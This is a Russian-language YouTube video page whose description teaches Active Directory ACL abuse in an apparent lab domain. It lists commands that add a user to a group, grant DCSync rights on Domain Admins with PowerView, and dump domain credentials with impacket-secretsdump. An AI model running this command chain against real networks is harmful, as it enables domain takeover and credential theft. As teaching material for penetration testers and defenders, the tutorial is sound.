Перейти к содержимому

Злоупотребление ACLs

Thatquietkid

0:00 / 0:00

Злоупотребление ACLs

609 просмотров · 2 года назад
Thatquietkid
1,13 тыс. подписчиков
609 просмотров · 2 года назад
Добро пожаловать на мой YouTube-канал. В этом видео я подробно рассматриваю злоупотребление списками контроля доступа (ACL), стремясь предоставить ценную информацию и образовательный контент. Образовательная цель: Узнайте, как использовать уязвимости ACL в среде Active Directory. Отказ от ответственности: Это видео предназначено исключительно для образовательных целей. В нем рассматривается вектор атаки на Active Directory — злоупотребление ACL. Я не одобряю и не поощряю какие-либо неэтичные или злонамеренные действия. Соответствие правилам сообщества: Я придерживаюсь правил и стандартов сообщества YouTube. Если у вас есть какие-либо вопросы или замечания, пожалуйста, свяжитесь со мной, и я отвечу на них оперативно. Использованные команды: 1) crackmapexec smb 10.0.2.16 -u abuse -p 'ACL@rocks' 2) xfreerdp /u:abuse /p:ACL@rocks /v:10.0.2.28 3) net group "ACLabuse" /domain 4) net group "ACLabuse" abuse /add /domain 5) $SecPassword = ConvertTo-SecureString 'ACL@rocks' -AsPlainText -Force 6) $Cred = New-Object System.Management.Automation.PSCredential('BERSERK.local\abuse', $SecPassword) 7) . .\PowerView.ps1 8) Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'test' -TargetIdentity 'BERSERK.LOCAL\Domain Admins' -Rights DCSync 9) impacket-secretsdump BERSERK.local/abuse:'ACL@rocks'@10.0.2.16